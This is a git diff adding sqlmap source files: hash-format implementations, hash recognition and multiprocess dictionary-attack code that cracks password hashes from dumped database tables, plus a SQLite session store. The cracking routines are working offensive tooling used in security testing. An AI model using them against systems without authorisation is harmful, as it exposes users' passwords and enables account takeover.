http://scriptserver.mainframe8.com/wordpress_password_hasher.php + https://www.openwall.com/phpass/ + https://github.com/jedie/django-phpBB3/blob/master/django_phpBB3/hashers.py + + >>> phpass_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$') + '$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0' + >>> phpass_passwd(password='testpass', salt='Pb1j9gSb', count=2048, prefix='$H$') + '$H$9Pb1j9gSb/u3EVQ.4JDZ3LqtN44oIx/' + >>> phpass_passwd(password='testpass', salt='iwtD/g.K', count=128, prefix='$S$') + '$S$5iwtD/g.KZT2rwC9DASy/mGYAThkSd3lBFdkONi1Ig1IEpBpqG8W' + """ + + def _encode64(input_, count): + output = '' + i = 0 + + while i < count: + value = (input_[i] if isinstance(input_[i], int) else ord(input_[i])) + i += 1 + output = output + ITOA64[value & 0x3f] + + if i < count: + value = value | ((input_[i] if isinstance(input_[i], int) else ord(input_[i])) << 8) + + output = output + ITOA64[(value >> 6) & 0x3f] + + i += 1 + if i >= count: + break + + if i < count: + value = value | ((input_[i] if isinstance(input_[i], int) else ord(input_[i])) << 16) + + output = output + ITOA64[(value >> 12) & 0x3f] + + i += 1 + if i >= count: + break + + output = output + ITOA64[(value >> 18) & 0x3f] + + return output + + password = getBytes(password) + f = {"$P$": md5, "$H$": md5, "$Q$": sha1, "$S$": sha512}[prefix] + + cipher = f(getBytes(salt)) + cipher.update(password) + hash_ = cipher.digest() + + for i in xrange(count): + _ = f(hash_) + _.update(password) + hash_ = _.digest() + + retVal = "%s%s%s%s" % (prefix, ITOA64[int(math.log(count, 2))], salt, _encode64(hash_, len(hash_))) + + if prefix == "$S$": + # Reference: https://api.drupal.org/api/drupal/includes%21password.inc/constant/DRUPAL_HASH_LENGTH/7.x + retVal = retVal[:55] + + return retVal + +__functions__ = { + HASH.MYSQL: mysql_passwd, + HASH.MYSQL_OLD: mysql_old_passwd, + HASH.POSTGRES: postgres_passwd, + HASH.MSSQL: mssql_passwd, + HASH.MSSQL_OLD: mssql_old_passwd, + HASH.MSSQL_NEW: mssql_new_passwd, + HASH.ORACLE: oracle_passwd, + HASH.ORACLE_OLD: oracle_old_passwd, + HASH.MD5_GENERIC: md5_generic_passwd, + HASH.SHA1_GENERIC: sha1_generic_passwd, + HASH.SHA224_GENERIC: sha224_generic_passwd, + HASH.SHA256_GENERIC: sha256_generic_passwd, + HASH.SHA384_GENERIC: sha384_generic_passwd, + HASH.SHA512_GENERIC: sha512_generic_passwd, + HASH.CRYPT_GENERIC: crypt_generic_passwd, + HASH.JOOMLA: joomla_passwd, + HASH.DJANGO_MD5: django_md5_passwd, + HASH.DJANGO_SHA1: django_sha1_passwd, + HASH.PHPASS: phpass_passwd, + HASH.APACHE_MD5_CRYPT: unix_md5_passwd, + HASH.UNIX_MD5_CRYPT: unix_md5_passwd, + HASH.APACHE_SHA1: apache_sha1_passwd, + HASH.VBULLETIN: vbulletin_passwd, + HASH.VBULLETIN_OLD: vbulletin_passwd, + HASH.SSHA: ssha_passwd, + HASH.SSHA256: ssha256_passwd, + HASH.SSHA512: ssha512_passwd, + HASH.MD5_BASE64: md5_generic_passwd, + HASH.SHA1_BASE64: sha1_generic_passwd, + HASH.SHA256_BASE64: sha256_generic_passwd, + HASH.SHA512_BASE64: sha512_generic_passwd, +} + +def _finalize(retVal, results, processes, attack_info=None): + if _multiprocessing: + gc.enable() + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4367 + # NOTE: https://dzone.com/articles/python-101-creating-multiple-processes + for process in processes: + try: + process.terminate() + process.join() + except (OSError, AttributeError): + pass + + if retVal: + removals = set() + + if conf.hashDB: + conf.hashDB.beginTransaction() + + while not retVal.empty(): + user, hash_, word = item = retVal.get(block=False) + results.append(item) + removals.add((user, hash_)) + hashDBWrite(hash_, word) + + for item in attack_info or []: + if (item[0][0], item[0][1]) in removals: + attack_info.remove(item) + + if conf.hashDB: + conf.hashDB.endTransaction() + + if hasattr(retVal, "close"): + retVal.close() + +def storeHashesToFile(attack_dict): + if not attack_dict: + return + + items = OrderedSet() + + for user, hashes in attack_dict.items(): + for hash_ in hashes: + hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ + if hash_ and hash_ != NULL and hashRecognition(hash_): + item = None + if user and not user.startswith(DUMMY_USER_PREFIX): + item = "%s:%s\n" % (user, hash_) + else: + item = "%s\n" % hash_ + + if item and item not in items: + items.add(item) + + if kb.choices.storeHashes is None: + message = "do you want to store hashes to a temporary file " + message += "for eventual further processing with other tools [y/N] " + + kb.choices.storeHashes = readInput(message, default='N', boolean=True) + + if items and kb.choices.storeHashes: + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.HASHES, suffix=".txt") + os.close(handle) + + infoMsg = "writing hashes to a temporary file '%s' " % filename + logger.info(infoMsg) + + with openFile(filename, "w+") as f: + for item in items: + try: + f.write(item) + except (UnicodeError, TypeError): + pass + +def attackCachedUsersPasswords(): + if kb.data.cachedUsersPasswords: + results = dictionaryAttack(kb.data.cachedUsersPasswords) + + lut = {} + for (_, hash_, password) in results: + lut[hash_.lower()] = password + + for user in kb.data.cachedUsersPasswords: + for i in xrange(len(kb.data.cachedUsersPasswords[user])): + if (kb.data.cachedUsersPasswords[user][i] or "").strip(): + value = kb.data.cachedUsersPasswords[user][i].lower().split()[0] + if value in lut: + kb.data.cachedUsersPasswords[user][i] += "%s clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value]) + +def attackDumpedTable(): + if kb.data.dumpedTable: + table = kb.data.dumpedTable + columns = list(table.keys()) + count = table["__infos__"]["count"] + + if not count: + return + + debugMsg = "analyzing table dump for possible password hashes" + logger.debug(debugMsg) + + found = False + col_user = '' + col_passwords = set() + attack_dict = {} + binary_fields = OrderedSet() + replacements = {} + + for column in sorted(columns, key=len, reverse=True): + if column and column.lower() in COMMON_USER_COLUMNS: + col_user = column + break + + for column in columns: + if column != "__infos__" and table[column]["values"]: + if all(INVALID_UNICODE_CHAR_FORMAT.split('%')[0] in (value or "") for value in table[column]["values"]): + binary_fields.add(column) + + if binary_fields: + _ = ','.join(binary_fields) + warnMsg = "potential binary fields detected ('%s'). In case of any problems you are " % _ + warnMsg += "advised to rerun table dump with '--fresh-queries --binary-fields=\"%s\"'" % _ + logger.warning(warnMsg) + + for i in xrange(count): + if not found and i > HASH_RECOGNITION_QUIT_THRESHOLD: + break + + for column in columns: + if column == col_user or column == "__infos__": + continue + + if len(table[column]["values"]) <= i: + continue + + if conf.binaryFields and column in conf.binaryFields: + continue + + value = table[column]["values"][i] + + if column in binary_fields and re.search(HASH_BINARY_COLUMNS_REGEX, column) is not None: + previous = value + value = encodeHex(getBytes(value), binary=False) + replacements[value] = previous + + if hashRecognition(value): + found = True + + if col_user and i < len(table[col_user]["values"]): + if table[col_user]["values"][i] not in attack_dict: + attack_dict[table[col_user]["values"][i]] = [] + + attack_dict[table[col_user]["values"][i]].append(value) + else: + attack_dict["%s%d" % (DUMMY_USER_PREFIX, i)] = [value] + + col_passwords.add(column) + + if attack_dict: + infoMsg = "recognized possible password hashes in column%s " % ("s" if len(col_passwords) > 1 else "") + infoMsg += "'%s'" % ", ".join(col for col in col_passwords) + logger.info(infoMsg) + + storeHashesToFile(attack_dict) + + message = "do you want to crack them via a dictionary-based attack? %s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]") + choice = readInput(message, default='N' if conf.multipleTargets else 'Y').upper() + + if choice == 'N': + return + elif choice == 'Q': + raise SqlmapUserQuitException + + results = dictionaryAttack(attack_dict) + lut = dict() + + for (_, hash_, password) in results: + if hash_: + key = hash_ if hash_ not in replacements else replacements[hash_] + lut[key.lower()] = password + lut["0x%s" % key.lower()] = password + + debugMsg = "post-processing table dump" + logger.debug(debugMsg) + + for i in xrange(count): + for column in columns: + if not (column == col_user or column == '__infos__' or len(table[column]['values']) <= i): + value = table[column]['values'][i] + + if value and value.lower() in lut: + table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()] or HASH_EMPTY_PASSWORD_MARKER)) + table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i])) + +def hashRecognition(value): + """ + >>> hashRecognition("179ad45c6ce2cb97cf1029e212046e81") == HASH.MD5_GENERIC + True + >>> hashRecognition("S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C") == HASH.ORACLE + True + >>> hashRecognition("foobar") == None + True + """ + + retVal = None + + if value and len(value) >= 8 and ' ' not in value: # Note: pre-filter condition (for optimization purposes) + isOracle, isMySQL = Backend.isDbms(DBMS.ORACLE), Backend.isDbms(DBMS.MYSQL) + + if kb.cache.hashRegex is None: + parts = [] + + for name, regex in getPublicTypeMembers(HASH): + # Hashes for Oracle and old MySQL look the same hence these checks + if isOracle and regex == HASH.MYSQL_OLD or isMySQL and regex == HASH.ORACLE_OLD: + continue + elif regex == HASH.CRYPT_GENERIC: + if any((value.lower() == value, value.upper() == value)): + continue + else: + parts.append("(?P<%s>%s)" % (name, regex)) + + kb.cache.hashRegex = ('|'.join(parts)).replace("(?i)", "") + + if isinstance(value, six.string_types): + match = re.search(kb.cache.hashRegex, value, re.I) + if match: + algorithm, _ = [_ for _ in match.groupdict().items() if _[1] is not None][0] + retVal = getattr(HASH, algorithm) + + return retVal + +def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist, api): + if IS_WIN: + coloramainit() + + count = 0 + rotator = 0 + hashes = set(item[0][1] for item in attack_info) + + wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) + + try: + for word in wordlist: + if not attack_info: + break + + count += 1 + + if isinstance(word, six.binary_type): + word = getUnicode(word) + elif not isinstance(word, six.string_types): + continue + + if suffix: + word = word + suffix + + try: + current = __functions__[hash_regex](password=word, uppercase=False) + + if current in hashes: + for item in attack_info[:]: + ((user, hash_), _) = item + + if hash_ == current: + retVal.put((user, hash_, word)) + + clearConsoleLine() + + infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) + + if user and not user.startswith(DUMMY_USER_PREFIX): + infoMsg += " for user '%s'\n" % user + else: + infoMsg += " for hash '%s'\n" % hash_ + + dataToStdout(infoMsg, True) + + attack_info.remove(item) + + elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: + rotator += 1 + + if rotator >= len(ROTATING_CHARS): + rotator = 0 + + status = "current status: %s... %s" % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) + + if not api: + dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) + + except KeyboardInterrupt: + raise + + except (UnicodeEncodeError, UnicodeDecodeError): + pass # ignore possible encoding problems caused by some words in custom dictionaries + + except Exception as ex: + warnMsg = "there was a problem while hashing entry: %s ('%s'). " % (repr(word), getSafeExString(ex)) + warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS + logger.critical(warnMsg) + + except KeyboardInterrupt: + pass + + finally: + if hasattr(proc_count, "value"): + with proc_count.get_lock(): + proc_count.value -= 1 + +def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist, api): + if IS_WIN: + coloramainit() + + count = 0 + rotator = 0 + + wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) + + try: + for word in wordlist: + if found.value: + break + + count += 1 + + if isinstance(word, six.binary_type): + word = getUnicode(word) + elif not isinstance(word, six.string_types): + continue + + if suffix: + word = word + suffix + + try: + current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) + + if hash_ == current: + if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes + word = word.upper() + + retVal.put((user, hash_, word)) + + clearConsoleLine() + + infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) + + if user and not user.startswith(DUMMY_USER_PREFIX): + infoMsg += " for user '%s'\n" % user + else: + infoMsg += " for hash '%s'\n" % hash_ + + dataToStdout(infoMsg, True) + + found.value = True + + elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: + rotator += 1 + + if rotator >= len(ROTATING_CHARS): + rotator = 0 + + status = "current status: %s... %s" % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) + + if user and not user.startswith(DUMMY_USER_PREFIX): + status += " (user: %s)" % user + + if not api: + dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) + + except KeyboardInterrupt: + raise + + except (UnicodeEncodeError, UnicodeDecodeError): + pass # ignore possible encoding problems caused by some words in custom dictionaries + + except Exception as ex: + warnMsg = "there was a problem while hashing entry: %s ('%s'). " % (repr(word), getSafeExString(ex)) + warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS + logger.critical(warnMsg) + + except KeyboardInterrupt: + pass + + finally: + if hasattr(proc_count, "value"): + with proc_count.get_lock(): + proc_count.value -= 1 + +def dictionaryAttack(attack_dict): + global _multiprocessing + + suffix_list = [""] + custom_wordlist = [""] + hash_regexes = [] + results = [] + resumes = [] + user_hash = [] + processException = False + foundHash = False + + if conf.disableMulti: + _multiprocessing = None + else: + # Note: https://github.com/sqlmapproject/sqlmap/issues/4367 + try: + import multiprocessing + + # problems on FreeBSD (Reference: https://web.archive.org/web/20110710041353/http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx) + _ = multiprocessing.Queue() + + # problems with ctypes (Reference: https://github.com/sqlmapproject/sqlmap/issues/2952) + _ = multiprocessing.Value('i') + except (ImportError, OSError, AttributeError): + pass + else: + try: + if multiprocessing.cpu_count() > 1: + _multiprocessing = multiprocessing + except NotImplementedError: + pass + + for (_, hashes) in attack_dict.items(): + for hash_ in hashes: + if not hash_: + continue + + hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ + regex = hashRecognition(hash_) + + if regex and regex not in hash_regexes: + hash_regexes.append(regex) + infoMsg = "using hash method '%s'" % __functions__[regex].__name__ + logger.info(infoMsg) + + for hash_regex in hash_regexes: + keys = set() + attack_info = [] + + for (user, hashes) in attack_dict.items(): + for hash_ in hashes: + if not hash_: + continue + + foundHash = True + hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ + + if re.match(hash_regex, hash_): + try: + item = None + + if hash_regex not in (HASH.CRYPT_GENERIC, HASH.JOOMLA, HASH.PHPASS, HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT, HASH.APACHE_SHA1, HASH.VBULLETIN, HASH.VBULLETIN_OLD, HASH.SSHA, HASH.SSHA256, HASH.SSHA512, HASH.DJANGO_MD5, HASH.DJANGO_SHA1, HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): + hash_ = hash_.lower() + + if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): + item = [(user, encodeHex(decodeBase64(hash_, binary=True))), {}] + elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1): + if hash_.startswith("0x"): # Reference: https://docs.microsoft.com/en-us/sql/t-sql/functions/hashbytes-transact-sql?view=sql-server-2017 + hash_ = hash_[2:] + item = [(user, hash_), {}] + elif hash_regex in (HASH.SSHA,): + item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[20:]}] + elif hash_regex in (HASH.SSHA256,): + item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[32:]}] + elif hash_regex in (HASH.SSHA512,): + item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[64:]}] + elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): + item = [(user, hash_), {'username': user}] + elif hash_regex in (HASH.ORACLE,): + item = [(user, hash_), {"salt": hash_[-20:]}] + elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): + item = [(user, hash_), {"salt": hash_[6:14]}] + elif hash_regex in (HASH.CRYPT_GENERIC,): + item = [(user, hash_), {"salt": hash_[0:2]}] + elif hash_regex in (HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT): + item = [(user, hash_), {"salt": hash_.split('$')[2], "magic": "$%s$" % hash_.split('$')[1]}] + elif hash_regex in (HASH.JOOMLA, HASH.VBULLETIN, HASH.VBULLETIN_OLD): + item = [(user, hash_), {"salt": hash_.split(':')[-1]}] + elif hash_regex in (HASH.DJANGO_MD5, HASH.DJANGO_SHA1): + item = [(user, hash_), {"salt": hash_.split('$')[1]}] + elif hash_regex in (HASH.PHPASS,): + if ITOA64.index(hash_[3]) < 32: + item = [(user, hash_), {"salt": hash_[4:12], "count": 1 << ITOA64.index(hash_[3]), "prefix": hash_[:3]}] + else: + warnMsg = "invalid hash '%s'" % hash_ + logger.warning(warnMsg) + + if item and hash_ not in keys: + resumed = hashDBRetrieve(hash_) + if not resumed: + attack_info.append(item) + user_hash.append(item[0]) + else: + infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) + if user and not user.startswith(DUMMY_USER_PREFIX): + infoMsg += " for user '%s'" % user + logger.info(infoMsg) + resumes.append((user, hash_, resumed)) + keys.add(hash_) + + except (binascii.Error, TypeError, IndexError): + pass + + if not attack_info: + continue + + if not kb.wordlists: + while not kb.wordlists: + + # the slowest of all methods hence smaller default dict + if hash_regex in (HASH.ORACLE_OLD, HASH.PHPASS): + dictPaths = [paths.SMALL_DICT] + else: + dictPaths = [paths.WORDLIST] + + message = "what dictionary do you want to use?\n" + message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] + message += "[2] custom dictionary file\n" + message += "[3] file with list of dictionary files" + choice = readInput(message, default='1') + + try: + if choice == '2': + message = "what's the custom dictionary's location?\n" + dictPath = readInput(message) + if dictPath: + dictPaths = [dictPath] + logger.info("using custom dictionary") + elif choice == '3': + message = "what's the list file location?\n" + listPath = readInput(message) + checkFile(listPath) + dictPaths = getFileItems(listPath) + logger.info("using custom list of dictionaries") + else: + logger.info("using default dictionary") + + dictPaths = [_ for _ in dictPaths if _] + + for dictPath in dictPaths: + checkFile(dictPath) + + if isZipFile(dictPath): + _ = zipfile.ZipFile(dictPath, 'r') + if len(_.namelist()) == 0: + errMsg = "no file(s) inside '%s'" % dictPath + raise SqlmapDataException(errMsg) + else: + _.open(_.namelist()[0]) + + kb.wordlists = dictPaths + + except Exception as ex: + warnMsg = "there was a problem while loading dictionaries" + warnMsg += " ('%s')" % getSafeExString(ex) + logger.critical(warnMsg) + + message = "do you want to use common password suffixes? (slow!) [y/N] " + + if readInput(message, default='N', boolean=True): + suffix_list += COMMON_PASSWORD_SUFFIXES + + infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].__name__ + logger.info(infoMsg) + + for item in attack_info: + ((user, _), _) = item + if user and not user.startswith(DUMMY_USER_PREFIX): + custom_wordlist.append(normalizeUnicode(user)) + + # Algorithms without extra arguments (e.g. salt and/or username) + if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1): + for suffix in suffix_list: + if not attack_info or processException: + break + + if suffix: + clearConsoleLine() + infoMsg = "using suffix '%s'" % suffix + logger.info(infoMsg) + + retVal = None + processes = [] + + try: + if _multiprocessing: + if _multiprocessing.cpu_count() > 1: + infoMsg = "starting %d processes " % _multiprocessing.cpu_count() + singleTimeLogMessage(infoMsg) + + gc.disable() + + retVal = _multiprocessing.Queue() + count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) + + for i in xrange(_multiprocessing.cpu_count()): + process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api)) + processes.append(process) + + for process in processes: + process.daemon = True + process.start() + + while count.value > 0: + time.sleep(0.5) + + else: + warnMsg = "multiprocessing hash cracking is currently " + warnMsg += "%s on this platform" % ("not supported" if not conf.disableMulti else "disabled") + singleTimeWarnMessage(warnMsg) + + retVal = _queue.Queue() + _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api) + + except KeyboardInterrupt: + print() + processException = True + warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" + logger.warning(warnMsg) + + finally: + _finalize(retVal, results, processes, attack_info) + + clearConsoleLine() + + else: + for ((user, hash_), kwargs) in attack_info: + if processException: + break + + if any(_[0] == user and _[1] == hash_ for _ in results): + continue + + count = 0 + found = False + + for suffix in suffix_list: + if found or processException: + break + + if suffix: + clearConsoleLine() + infoMsg = "using suffix '%s'" % suffix + logger.info(infoMsg) + + retVal = None + processes = [] + + try: + if _multiprocessing: + if _multiprocessing.cpu_count() > 1: + infoMsg = "starting %d processes " % _multiprocessing.cpu_count() + singleTimeLogMessage(infoMsg) + + gc.disable() + + retVal = _multiprocessing.Queue() + found_ = _multiprocessing.Value('i', False) + count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) + + for i in xrange(_multiprocessing.cpu_count()): + process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api)) + processes.append(process) + + for process in processes: + process.daemon = True + process.start() + + while count.value > 0: + time.sleep(0.5) + + found = found_.value != 0 + + else: + warnMsg = "multiprocessing hash cracking is currently " + warnMsg += "%s on this platform" % ("not supported" if not conf.disableMulti else "disabled") + singleTimeWarnMessage(warnMsg) + + class Value(object): + pass + + retVal = _queue.Queue() + found_ = Value() + found_.value = False + + _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api) + + found = found_.value + + except KeyboardInterrupt: + print() + processException = True + warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" + logger.warning(warnMsg) + + for process in processes: + try: + process.terminate() + process.join() + except (OSError, AttributeError): + pass + + finally: + _finalize(retVal, results, processes, attack_info) + + clearConsoleLine() + + results.extend(resumes) + + if foundHash and len(hash_regexes) == 0: + warnMsg = "unknown hash format" + logger.warning(warnMsg) + + if len(results) == 0: + warnMsg = "no clear password(s) found" + logger.warning(warnMsg) + + return results + +def crackHashFile(hashFile): + i = 0 + attack_dict = {} + + for line in getFileItems(conf.hashFile): + if ':' in line: + user, hash_ = line.split(':', 1) + attack_dict[user] = [hash_] + else: + attack_dict["%s%d" % (DUMMY_USER_PREFIX, i)] = [line] + i += 1 + + dictionaryAttack(attack_dict) diff --git a/src/sqlmap-master/lib/utils/hashdb.py b/src/sqlmap-master/lib/utils/hashdb.py new file mode 100644 index 0000000..4395236 --- /dev/null +++ b/src/sqlmap-master/lib/utils/hashdb.py @@ -0,0 +1,220 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import hashlib +import os +import sqlite3 +import threading +import time + +from lib.core.common import getSafeExString +from lib.core.common import serializeObject +from lib.core.common import singleTimeWarnMessage +from lib.core.common import unserializeObject +from lib.core.compat import xrange +from lib.core.convert import getBytes +from lib.core.convert import getUnicode +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from lib.core.settings import HASHDB_END_TRANSACTION_RETRIES +from lib.core.settings import HASHDB_FLUSH_RETRIES +from lib.core.settings import HASHDB_FLUSH_THRESHOLD +from lib.core.settings import HASHDB_RETRIEVE_RETRIES +from lib.core.threads import getCurrentThreadData +from lib.core.threads import getCurrentThreadName +from thirdparty import six + +class HashDB(object): + def __init__(self, filepath): + self.filepath = filepath + self._write_cache = {} + self._cache_lock = threading.Lock() + self._connections = [] + + def _get_cursor(self): + threadData = getCurrentThreadData() + + if threadData.hashDBCursor is None: + try: + connection = sqlite3.connect(self.filepath, timeout=3, isolation_level=None) + self._connections.append(connection) + threadData.hashDBCursor = connection.cursor() + threadData.hashDBCursor.execute("CREATE TABLE IF NOT EXISTS storage (id INTEGER PRIMARY KEY, value TEXT)") + connection.commit() + except Exception as ex: + errMsg = "error occurred while opening a session " + errMsg += "file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) + + return threadData.hashDBCursor + + def _set_cursor(self, cursor): + threadData = getCurrentThreadData() + threadData.hashDBCursor = cursor + + cursor = property(_get_cursor, _set_cursor) + + def close(self): + threadData = getCurrentThreadData() + try: + if threadData.hashDBCursor: + threadData.hashDBCursor.connection.commit() + threadData.hashDBCursor.close() + threadData.hashDBCursor.connection.close() + threadData.hashDBCursor = None + except: + pass + + def closeAll(self): + for connection in self._connections: + try: + connection.commit() + connection.close() + except: + pass + + @staticmethod + def hashKey(key): + key = getBytes(key if isinstance(key, six.text_type) else repr(key), errors="xmlcharrefreplace") + retVal = int(hashlib.md5(key).hexdigest(), 16) & 0x7fffffffffffffff # Reference: http://stackoverflow.com/a/4448400 + return retVal + + def retrieve(self, key, unserialize=False): + retVal = None + + if key and (self._write_cache or os.path.isfile(self.filepath)): + hash_ = HashDB.hashKey(key) + retVal = self._write_cache.get(hash_) + if not retVal: + for _ in xrange(HASHDB_RETRIEVE_RETRIES): + try: + for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)): + retVal = row[0] + except (sqlite3.OperationalError, sqlite3.DatabaseError) as ex: + if any(_ in getSafeExString(ex) for _ in ("locked", "no such table")): + warnMsg = "problem occurred while accessing session file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) + singleTimeWarnMessage(warnMsg) + elif "Could not decode" in getSafeExString(ex): + break + else: + errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, getSafeExString(ex)) + errMsg += "If the problem persists please rerun with '--flush-session'" + raise SqlmapConnectionException(errMsg) + else: + break + + time.sleep(1) + + if retVal and unserialize: + try: + retVal = unserializeObject(retVal) + except: + retVal = None + warnMsg = "error occurred while unserializing value for session key '%s'. " % key + warnMsg += "If the problem persists please rerun with '--flush-session'" + logger.warning(warnMsg) + + return retVal + + def write(self, key, value, serialize=False): + if key: + hash_ = HashDB.hashKey(key) + self._cache_lock.acquire() + self._write_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value) + self._cache_lock.release() + + if getCurrentThreadName() in ('0', "MainThread"): + self.flush() + + def flush(self, forced=False): + if not self._write_cache: + return + + if not forced and len(self._write_cache) < HASHDB_FLUSH_THRESHOLD: + return + + self._cache_lock.acquire() + _ = self._write_cache + self._write_cache = {} + self._cache_lock.release() + + try: + self.beginTransaction() + for hash_, value in _.items(): + retries = 0 + while True: + try: + try: + self.cursor.execute("INSERT INTO storage VALUES (?, ?)", (hash_, value,)) + except sqlite3.IntegrityError: + self.cursor.execute("UPDATE storage SET value=? WHERE id=?", (value, hash_,)) + except (UnicodeError, OverflowError): # e.g. surrogates not allowed (Issue #3851) + break + except sqlite3.DatabaseError as ex: + if not os.path.exists(self.filepath): + debugMsg = "session file '%s' does not exist" % self.filepath + logger.debug(debugMsg) + break + + if retries == 0: + warnMsg = "there has been a problem while writing to " + warnMsg += "the session file ('%s')" % getSafeExString(ex) + logger.warning(warnMsg) + + if retries >= HASHDB_FLUSH_RETRIES: + return + else: + retries += 1 + time.sleep(1) + else: + break + finally: + self.endTransaction() + + def beginTransaction(self): + threadData = getCurrentThreadData() + if not threadData.inTransaction: + try: + self.cursor.execute("BEGIN TRANSACTION") + except: + try: + # Reference: http://stackoverflow.com/a/25245731 + self.cursor.close() + except sqlite3.ProgrammingError: + pass + threadData.hashDBCursor = None + self.cursor.execute("BEGIN TRANSACTION") + finally: + threadData.inTransaction = True + + def endTransaction(self): + threadData = getCurrentThreadData() + if threadData.inTransaction: + retries = 0 + while retries < HASHDB_END_TRANSACTION_RETRIES: + try: + self.cursor.execute("END TRANSACTION") + threadData.inTransaction = False + except sqlite3.OperationalError: + pass + except sqlite3.ProgrammingError: + self.cursor = None + threadData.inTransaction = False + return + else: + return + + retries += 1 + time.sleep(1) + + try: + self.cursor.execute("ROLLBACK TRANSACTION") + except sqlite3.OperationalError: + self.cursor.close() + self.cursor = None + finally: + threadData.inTransaction = False diff --git a/src/sqlmap-master/lib/utils/httpd.py b/src/sqlmap-master/lib/utils/httpd.py new file mode 100644 index 0000000..aba688d --- /dev/null +++ b/src/sqlmap-master/lib/utils/httpd.py @@ -0,0 +1,141 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import mimetypes +import gzip +import os +import re +import sys +import threading +import time +import traceback + +sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))) + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import VERSION_STRING +from thirdparty import six +from thirdparty.six.moves import BaseHTTPServer as _BaseHTTPServer +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import socketserver as _socketserver +from thirdparty.six.moves import urllib as _urllib + +HTTP_ADDRESS = "0.0.0.0" +HTTP_PORT = 8951 +DEBUG = True +HTML_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "data", "html")) 